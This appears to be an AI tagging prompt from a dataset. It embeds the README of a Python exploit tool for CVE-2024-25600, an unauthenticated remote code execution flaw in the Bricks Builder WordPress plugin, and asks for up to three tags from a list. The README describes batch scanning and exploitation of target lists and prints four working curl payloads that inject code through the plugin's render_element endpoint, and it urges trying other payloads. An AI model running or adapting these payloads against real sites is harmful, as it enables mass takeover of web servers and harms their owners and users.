AI prompts
base on Unauthenticated Remote Code Execution â Bricks <= 1.9.6 # CVE-2024-25600 Exploit Tool đ
## Description đ
This tool đ ī¸ is designed to exploit the CVE-2024-25600 vulnerability đŗī¸ found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites đģ. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.
## Features đ
- **Interactive Mode**: Engage with the target website in real-time đšī¸.
- **Batch Mode**: Scan and exploit multiple websites from a list đ.
- **Command Execution**: Execute arbitrary commands on the target server âī¸.
- **Payload Customization**: Choose between different payloads for exploitation, including `generic`, `carousel`, `container`, and `code` đ§°.
- **RCE Confirmation**: Option to display and record only URLs where RCE is confirmed âī¸.
## Installation đ ī¸
1. Clone this repository to your local machine đĨī¸ using `git clone`.
2. Navigate to the directory of the cloned repository.
3. Install the required Python libraries using `pip install -r requirements.txt`.
## Usage đ
### Interactive Mode đŽ
1. Run the tool with `python exploit.py -u <URL>` to start interactive mode.
2. Follow the on-screen prompts to send commands to the target server.
### Batch Mode đ
1. Prepare a text file with a list of target URLs.
2. Run the tool with `python exploit.py -l <file_path>` to scan and exploit the listed sites.
3. Use the `--only-rce` flag to display and record only URLs where RCE is confirmed.
### Payload Customization đ§°
- Use the `--payload-type` option followed by `generic`, `carousel`, `container`, or `code` to specify the type of payload for the exploit.
Example: `python exploit.py -u <URL> --payload-type generic`
## Proof of Concept (PoC) đ
The base PoCs provided by the disclosure are as follows:
**First PoC**:
```bash
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
```
**Second PoC**:
```bash
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
```
**Third PoC** [Source](https://www.linkedin.com/feed/update/urn:li:activity:7166462514099130368):
```bash
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": "1",
"loopElement": {
"settings": {
"query": {
"useQueryEditor": "",
"queryEditor": "throw new Exception(`id`);"
}
}
}
}'
```
**Fourth PoC** (Effective on Older Versions):
```bash
curl -k -X POST "http://[HOST]/index.php?rest_route=/bricks/v1/render_element" \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "code",
"settings": {
"executeCode": "true",
"code": "<?php throw new Exception(`id`);?>"
}
}
}'
```
> Note: The fourth PoC is particularly effective on older versions of Bricks Builder (tested on version 1.8), where previous PoCs may not work.
> It's possible that additional payloads could yield better results. If my exploit or proof of concept does not work for you, I encourage you to experiment with alternative payloads to find a more effective solution.
Replace `[HOST]` with the target website and `[NONCE]` with the nonce value retrieved from the site.
## Reference đ
For more information about the CVE-2024-25600 vulnerability, please refer to the detailed disclosure at [Snicco.io](https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6).
## Disclaimer â ī¸
The information provided in this README is for educational purposes only. Unauthorized hacking into websites or networks is illegal and unethical. đĢ
## Acknowledgements đ
Kudos to the security researchers who discovered and reported this vulnerability, providing the community with information and tools to help secure their web applications.
", Assign "at most 3 tags" to the expected json: {"id":"8017","tags":[]} "only from the tags list I provide: [{"id":77,"name":"3d"},{"id":89,"name":"agent"},{"id":17,"name":"ai"},{"id":54,"name":"algorithm"},{"id":24,"name":"api"},{"id":44,"name":"authentication"},{"id":3,"name":"aws"},{"id":27,"name":"backend"},{"id":60,"name":"benchmark"},{"id":72,"name":"best-practices"},{"id":39,"name":"bitcoin"},{"id":37,"name":"blockchain"},{"id":1,"name":"blog"},{"id":45,"name":"bundler"},{"id":58,"name":"cache"},{"id":21,"name":"chat"},{"id":49,"name":"cicd"},{"id":4,"name":"cli"},{"id":64,"name":"cloud-native"},{"id":48,"name":"cms"},{"id":61,"name":"compiler"},{"id":68,"name":"containerization"},{"id":92,"name":"crm"},{"id":34,"name":"data"},{"id":47,"name":"database"},{"id":8,"name":"declarative-gui "},{"id":9,"name":"deploy-tool"},{"id":53,"name":"desktop-app"},{"id":6,"name":"dev-exp-lib"},{"id":59,"name":"dev-tool"},{"id":13,"name":"ecommerce"},{"id":26,"name":"editor"},{"id":66,"name":"emulator"},{"id":62,"name":"filesystem"},{"id":80,"name":"finance"},{"id":15,"name":"firmware"},{"id":73,"name":"for-fun"},{"id":2,"name":"framework"},{"id":11,"name":"frontend"},{"id":22,"name":"game"},{"id":81,"name":"game-engine "},{"id":23,"name":"graphql"},{"id":84,"name":"gui"},{"id":91,"name":"http"},{"id":5,"name":"http-client"},{"id":51,"name":"iac"},{"id":30,"name":"ide"},{"id":78,"name":"iot"},{"id":40,"name":"json"},{"id":83,"name":"julian"},{"id":38,"name":"k8s"},{"id":31,"name":"language"},{"id":10,"name":"learning-resource"},{"id":33,"name":"lib"},{"id":41,"name":"linter"},{"id":28,"name":"lms"},{"id":16,"name":"logging"},{"id":76,"name":"low-code"},{"id":90,"name":"message-queue"},{"id":42,"name":"mobile-app"},{"id":18,"name":"monitoring"},{"id":36,"name":"networking"},{"id":7,"name":"node-version"},{"id":55,"name":"nosql"},{"id":57,"name":"observability"},{"id":46,"name":"orm"},{"id":52,"name":"os"},{"id":14,"name":"parser"},{"id":74,"name":"react"},{"id":82,"name":"real-time"},{"id":56,"name":"robot"},{"id":65,"name":"runtime"},{"id":32,"name":"sdk"},{"id":71,"name":"search"},{"id":63,"name":"secrets"},{"id":25,"name":"security"},{"id":85,"name":"server"},{"id":86,"name":"serverless"},{"id":70,"name":"storage"},{"id":75,"name":"system-design"},{"id":79,"name":"terminal"},{"id":29,"name":"testing"},{"id":12,"name":"ui"},{"id":50,"name":"ux"},{"id":88,"name":"video"},{"id":20,"name":"web-app"},{"id":35,"name":"web-server"},{"id":43,"name":"webassembly"},{"id":69,"name":"workflow"},{"id":87,"name":"yaml"}]" returns me the "expected json"